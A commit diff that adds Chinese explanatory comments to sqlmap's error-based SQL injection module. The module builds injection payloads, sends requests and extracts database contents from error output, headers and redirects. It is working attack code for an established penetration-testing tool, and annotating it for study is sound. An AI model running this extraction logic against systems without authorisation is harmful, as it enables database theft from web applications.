add comments to error/use.py

pull/3/head
wang 3 months ago
parent 7002527436
commit df472ac52d

@ -5,6 +5,7 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 导入需要的模块
from __future__ import print_function
import re
@ -63,98 +64,127 @@ from lib.utils.safe2bin import safecharencode
from thirdparty import six
def _oneShotErrorUse(expression, field=None, chunkTest=False):
offset = 1
rotator = 0
partialValue = None
threadData = getCurrentThreadData()
retVal = hashDBRetrieve(expression, checkConf=True)
"""
执行单次基于错误的SQL注入查询
参数:
expression - 要执行的SQL表达式
field - 要查询的字段名(可选)
chunkTest - 是否为分块测试模式(用于确定最佳查询长度)
返回:
查询结果
"""
# 初始化变量
offset = 1 # 结果偏移量,用于分块获取数据
rotator = 0 # 旋转字符索引,用于显示进度
partialValue = None # 存储部分查询结果
threadData = getCurrentThreadData() # 获取当前线程数据
retVal = hashDBRetrieve(expression, checkConf=True) # 尝试从缓存中获取结果
# 如果缓存的结果包含部分值标记,则提取部分值
if retVal and PARTIAL_VALUE_MARKER in retVal:
partialValue = retVal = retVal.replace(PARTIAL_VALUE_MARKER, "")
logger.info("resuming partial value: '%s'" % _formatPartialContent(partialValue))
offset += len(partialValue)
offset += len(partialValue) # 调整偏移量继续获取剩余数据
# 标记是否从缓存恢复数据
threadData.resumed = retVal is not None and not partialValue
# 对特定数据库进行错误分块长度检测
# 这是为了找到最佳的查询长度,避免数据库截断结果
if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and kb.errorChunkLength is None and not chunkTest and not kb.testMode:
debugMsg = "searching for error chunk length..."
logger.debug(debugMsg)
seen = set()
current = MAX_ERROR_CHUNK_LENGTH
seen = set() # 记录已测试过的长度
current = MAX_ERROR_CHUNK_LENGTH # 从最大长度开始测试
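# Probe downward from the maximum length: halve the length when the test character is not echoed back, otherwise retry with the length the server actually returned (or current - 1 if that length was already tried)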
while current >= MIN_ERROR_CHUNK_LENGTH:
testChar = str(current % 10)
testChar = str(current % 10) # 测试字符
# 根据不同数据库构造测试查询
if Backend.isDbms(DBMS.ORACLE):
testQuery = "RPAD('%s',%d,'%s')" % (testChar, current, testChar)
else:
testQuery = "%s('%s',%d)" % ("REPEAT" if Backend.isDbms(DBMS.MYSQL) else "REPLICATE", testChar, current)
testQuery = "SELECT %s" % (agent.hexConvertField(testQuery) if conf.hexConvert else testQuery)
# 执行测试查询
result = unArrayizeValue(_oneShotErrorUse(testQuery, chunkTest=True))
seen.add(current)
# 分析测试结果确定分块长度
if (result or "").startswith(testChar):
if result == testChar * current:
kb.errorChunkLength = current
kb.errorChunkLength = current # 找到合适的长度
break
else:
result = re.search(r"\A\w+", result).group(0)
candidate = len(result) - len(kb.chars.stop)
current = candidate if candidate != current and candidate not in seen else current - 1
else:
current = current // 2
current = current // 2 # 二分缩小范围
# 保存找到的分块长度
if kb.errorChunkLength:
hashDBWrite(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH, kb.errorChunkLength)
else:
kb.errorChunkLength = 0
# 如果没有缓存结果或者有部分值,执行实际查询
if retVal is None or partialValue:
try:
while True:
check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
trimCheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start
# 定义用于提取结果的正则表达式
check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) # 完整结果匹配
trimCheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start # 截断结果匹配
# 处理字段转换
if field:
nulledCastedField = agent.nullAndCastField(field)
nulledCastedField = agent.nullAndCastField(field) # 转换字段格式
# 对特定数据库进行分块处理
if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and not any(_ in field for _ in ("COUNT", "CASE")) and kb.errorChunkLength and not chunkTest:
extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(field), expression).group(0)
if extendedField != field: # e.g. MIN(surname)
if extendedField != field: # 处理聚合函数,如MIN(surname)
nulledCastedField = extendedField.replace(field, nulledCastedField)
field = extendedField
nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, kb.errorChunkLength)
# Forge the error-based SQL injection request
vector = getTechniqueData().vector
query = agent.prefixQuery(vector)
query = agent.suffixQuery(query)
injExpression = expression.replace(field, nulledCastedField, 1) if field else expression
injExpression = unescaper.escape(injExpression)
injExpression = query.replace("[QUERY]", injExpression)
payload = agent.payload(newValue=injExpression)
# 构造注入payload
vector = getTechniqueData().vector # 获取注入向量
query = agent.prefixQuery(vector) # 添加前缀
query = agent.suffixQuery(query) # 添加后缀
injExpression = expression.replace(field, nulledCastedField, 1) if field else expression # 替换字段
injExpression = unescaper.escape(injExpression) # 转义特殊字符
injExpression = query.replace("[QUERY]", injExpression) # 构造最终查询
payload = agent.payload(newValue=injExpression) # 生成payload
# Perform the request
# 发送HTTP请求
page, headers, _ = Request.queryPage(payload, content=True, raise404=False)
incrementCounter(getTechnique())
incrementCounter(getTechnique()) # 增加计数器
# 处理特殊字符转义
if page and conf.noEscape:
page = re.sub(r"('|\%%27)%s('|\%%27).*?('|\%%27)%s('|\%%27)" % (kb.chars.start, kb.chars.stop), "", page)
# Parse the returned page to get the exact error-based
# SQL injection output
# 从返回内容中提取结果
output = firstNotNone(
extractRegexResult(check, page),
extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),
extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
extractRegexResult(check, page), # 从页面内容提取
extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), # 从错误信息提取
extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), # 从响应头提取
extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) # 从重定向信息提取
)
# 处理输出结果
if output is not None:
output = getUnicode(output)
output = getUnicode(output) # 转换为Unicode
else:
# 处理被截断的结果
trimmed = firstNotNone(
extractRegexResult(trimCheck, page),
extractRegexResult(trimCheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
@ -163,12 +193,14 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
)
if trimmed:
# 警告可能的结果截断
if not chunkTest:
warnMsg = "possible server trimmed output detected "
warnMsg += "(due to its length and/or content): "
warnMsg += safecharencode(trimmed)
logger.warning(warnMsg)
# 尝试提取部分结果
if not kb.testMode:
check = r"(?P<result>[^<>\n]*?)%s" % kb.chars.stop[:2]
output = extractRegexResult(check, trimmed, re.IGNORECASE)
@ -179,78 +211,105 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
else:
output = output.rstrip()
# 处理不同数据库的结果拼接
if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)):
if offset == 1:
retVal = output
retVal = output # 第一块直接赋值
else:
retVal += output if output else ''
retVal += output if output else '' # 后续块拼接
# 判断是否需要继续获取下一块
if output and kb.errorChunkLength and len(output) >= kb.errorChunkLength and not chunkTest:
offset += kb.errorChunkLength
offset += kb.errorChunkLength # 增加偏移量
else:
break
break # 获取完成
# 显示进度
if output and conf.verbose in (1, 2) and not any((conf.api, kb.bruteMode)):
if kb.fileReadMode:
if kb.fileReadMode: # 文件读取模式
dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t"))
elif offset > 1:
elif offset > 1: # 显示旋转进度条
rotator += 1
if rotator >= len(ROTATING_CHARS):
rotator = 0
dataToStdout("\r%s\r" % ROTATING_CHARS[rotator])
else:
retVal = output
retVal = output # 其他数据库直接返回结果
break
except:
# 异常处理,保存部分结果
if retVal is not None:
hashDBWrite(expression, "%s%s" % (retVal, PARTIAL_VALUE_MARKER))
raise
retVal = decodeDbmsHexValue(retVal) if conf.hexConvert else retVal
# 处理结果编码
retVal = decodeDbmsHexValue(retVal) if conf.hexConvert else retVal # 十六进制解码
if isinstance(retVal, six.string_types):
retVal = htmlUnescape(retVal).replace("<br>", "\n")
retVal = htmlUnescape(retVal).replace("<br>", "\n") # HTML解码
retVal = _errorReplaceChars(retVal)
retVal = _errorReplaceChars(retVal) # 替换特殊字符
# 缓存结果
if retVal is not None:
hashDBWrite(expression, retVal)
else:
# 从缓存结果中提取数据
_ = "(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
retVal = extractRegexResult(_, retVal) or retVal
return safecharencode(retVal) if kb.safeCharEncode else retVal
def _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None, suppressOutput=False):
values = []
origExpr = None
"""
获取错误注入查询的字段值
参数:
expression - SQL表达式
expressionFields - 表达式中的字段
expressionFieldsList - 字段列表
num - 行号(可选)
emptyFields - 空字段列表(可选)
suppressOutput - 是否抑制输出
返回:
字段值列表
"""
values = [] # 存储所有字段的值
origExpr = None # 保存原始表达式
width = getConsoleWidth()
threadData = getCurrentThreadData()
width = getConsoleWidth() # 获取控制台宽度
threadData = getCurrentThreadData() # 获取当前线程数据
# 遍历所有字段
for field in expressionFieldsList:
output = None
# 跳过ROWNUM字段
if field.startswith("ROWNUM "):
continue
# 处理行号限制
if isinstance(num, int):
origExpr = expression
expression = agent.limitQuery(num, expression, field, expressionFieldsList[0])
# 替换表达式中的字段
if "ROWNUM" in expressionFieldsList:
expressionReplaced = expression
else:
expressionReplaced = expression.replace(expressionFields, field, 1)
# 执行查询获取字段值
output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field)
# 检查线程是否需要继续
if not kb.threadContinue:
return None
# 输出结果
if not any((suppressOutput, kb.bruteMode)):
if kb.fileReadMode and output and output.strip():
print()
@ -262,6 +321,7 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
dataToStdout("%s\n" % status)
# 恢复原始表达式
if isinstance(num, int):
expression = origExpr
@ -271,72 +331,96 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
def _errorReplaceChars(value):
"""
Restores safely replaced characters
还原安全替换的字符
参数:
value - 需要还原的字符串
返回:
还原后的字符串
"""
retVal = value
if value:
retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#")
# 替换特殊字符
retVal = retVal.replace(kb.chars.space, " ") # 空格
retVal = retVal.replace(kb.chars.dollar, "$") # 美元符号
retVal = retVal.replace(kb.chars.at, "@") # @符号
retVal = retVal.replace(kb.chars.hash_, "#") # #符号
return retVal
def _formatPartialContent(value):
"""
Prepares (possibly hex-encoded) partial content for safe console output
格式化部分内容用于安全的控制台输出
参数:
value - 需要格式化的值
返回:
格式化后的字符串
"""
if value and isinstance(value, six.string_types):
try:
value = decodeHex(value, binary=False)
value = decodeHex(value, binary=False) # 尝试十六进制解码
except:
pass
finally:
value = safecharencode(value)
value = safecharencode(value) # 安全编码
return value
def errorUse(expression, dump=False):
"""
Retrieve the output of a SQL query taking advantage of the error-based
SQL injection vulnerability on the affected parameter.
利用基于错误的SQL注入漏洞获取查询结果
这是主要的入口函数
参数:
expression - SQL表达式
dump - 是否为转储模式
返回:
查询结果
"""
# 初始化注入技术
initTechnique(getTechnique())
abortedFlag = False
count = None
emptyFields = []
start = time.time()
startLimit = 0
stopLimit = None
value = None
# 初始化变量
abortedFlag = False # 中断标记
count = None # 结果计数
emptyFields = [] # 空字段列表
start = time.time() # 开始时间
startLimit = 0 # 起始限制
stopLimit = None # 结束限制
value = None # 结果值
# 获取表达式字段信息
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression)
# Set kb.partRun in case the engine is called from the API
# 设置部分运行标记(API模式)
kb.partRun = getPartRun(alias=False) if conf.api else None
# We have to check if the SQL query might return multiple entries
# and in such case forge the SQL limiting the query output one
# entry at a time
# NOTE: we assume that only queries that get data from a table can
# return multiple entries
# 检查SQL查询是否可能返回多条记录
if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
# 添加限制条件
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump)
if limitCond:
# Count the number of SQL query entries output
# 计算查询结果数量
countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1)
# 移除ORDER BY子句(计数时不需要)
if " ORDER BY " in countedExpression.upper():
_ = countedExpression.upper().rindex(" ORDER BY ")
countedExpression = countedExpression[:_]
# 获取计数结果
_, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(countedExpression)
count = unArrayizeValue(_oneShotErrorUse(countedExpression, countedExpressionFields))
# 处理结果数量
if isNumPosStrValue(count):
# 限制最大结果数
if isinstance(stopLimit, int) and stopLimit > 0:
stopLimit = min(int(count), int(stopLimit))
else:
@ -347,6 +431,7 @@ def errorUse(expression, dump=False):
logger.debug(debugMsg)
elif count and not count.isdigit():
# 无法计数时假设只有一条结果
warnMsg = "it was not possible to count the number "
warnMsg += "of entries for the SQL query provided. "
warnMsg += "sqlmap will assume that it returns only "
@ -356,15 +441,18 @@ def errorUse(expression, dump=False):
stopLimit = 1
elif not isNumPosStrValue(count):
# 处理空结果
if not count:
warnMsg = "the SQL query provided does not "
warnMsg += "return any output"
logger.warning(warnMsg)
else:
value = [] # for empty tables
value = [] # 空表
return value
# 多线程处理多条记录
if isNumPosStrValue(count) and int(count) > 1:
# 询问是否移除ORDER BY以提高速度
if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
message = "due to huge table size do you want to remove "
message += "ORDER BY clause gaining speed over consistency? [y/N] "
@ -372,26 +460,30 @@ def errorUse(expression, dump=False):
if readInput(message, default='N', boolean=True):
expression = expression[:expression.index(" ORDER BY ")]
# 设置线程数
numThreads = min(conf.threads, (stopLimit - startLimit))
threadData = getCurrentThreadData()
try:
# 创建结果范围迭代器
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
except OverflowError:
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
errMsg += "with switch '--fresh-queries'"
raise SqlmapDataException(errMsg)
threadData.shared.value = BigArray()
threadData.shared.buffered = []
threadData.shared.counter = 0
threadData.shared.lastFlushed = startLimit - 1
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
# 初始化共享数据
threadData.shared.value = BigArray() # 存储结果
threadData.shared.buffered = [] # 缓冲区
threadData.shared.counter = 0 # 计数器
threadData.shared.lastFlushed = startLimit - 1 # 最后刷新位置
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 # 是否显示进度
if threadData.shared.showEta:
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
# 检查空列
if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):
for field in expressionFieldsList:
if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0':
@ -400,17 +492,23 @@ def errorUse(expression, dump=False):
debugMsg += "dumped as it appears to be empty"
logger.debug(debugMsg)
# 对大量数据禁用恢复信息显示
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
kb.suppressResumeInfo = True
debugMsg = "suppressing possible resume console info because of "
debugMsg += "large number of rows. It might take too long"
logger.debug(debugMsg)
# 执行多线程查询
try:
def errorThread():
"""
错误注入查询线程函数
"""
threadData = getCurrentThreadData()
while kb.threadContinue:
# 获取下一个查询范围
with kb.locks.limit:
try:
threadData.shared.counter += 1
@ -418,51 +516,63 @@ def errorUse(expression, dump=False):
except StopIteration:
break
# 执行查询
output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta)
if not kb.threadContinue:
break
# 处理单值结果
if output and isListLike(output) and len(output) == 1:
output = unArrayizeValue(output)
# 保存结果
with kb.locks.value:
index = None
if threadData.shared.showEta:
threadData.shared.progress.progress(threadData.shared.counter)
# 按顺序插入结果
for index in xrange(1 + len(threadData.shared.buffered)):
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
break
threadData.shared.buffered.insert(index or 0, (num, output))
# 刷新连续的结果
while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]:
threadData.shared.lastFlushed += 1
threadData.shared.value.append(threadData.shared.buffered[0][1])
del threadData.shared.buffered[0]
# 运行多线程
runThreads(numThreads, errorThread)
except KeyboardInterrupt:
# 处理用户中断
abortedFlag = True
warnMsg = "user aborted during enumeration. sqlmap "
warnMsg += "will display partial output"
logger.warning(warnMsg)
finally:
# 保存剩余结果
threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered))
value = threadData.shared.value
kb.suppressResumeInfo = False
# 单条记录查询
if not value and not abortedFlag:
value = _errorFields(expression, expressionFields, expressionFieldsList)
# 处理返回结果格式
if value and isListLike(value):
if len(value) == 1 and isinstance(value[0], (six.string_types, type(None))):
value = unArrayizeValue(value)
value = unArrayizeValue(value) # 单值结果
elif len(value) > 1 and stopLimit == 1:
value = [value]
value = [value] # 多值结果
# 计算执行时间
duration = calculateDeltaSeconds(start)
# 输出调试信息
if not kb.bruteMode:
debugMsg = "performed %d quer%s in %.2f seconds" % (kb.counters[getTechnique()], 'y' if kb.counters[getTechnique()] == 1 else "ies", duration)
logger.debug(debugMsg)

Loading…
Cancel
Save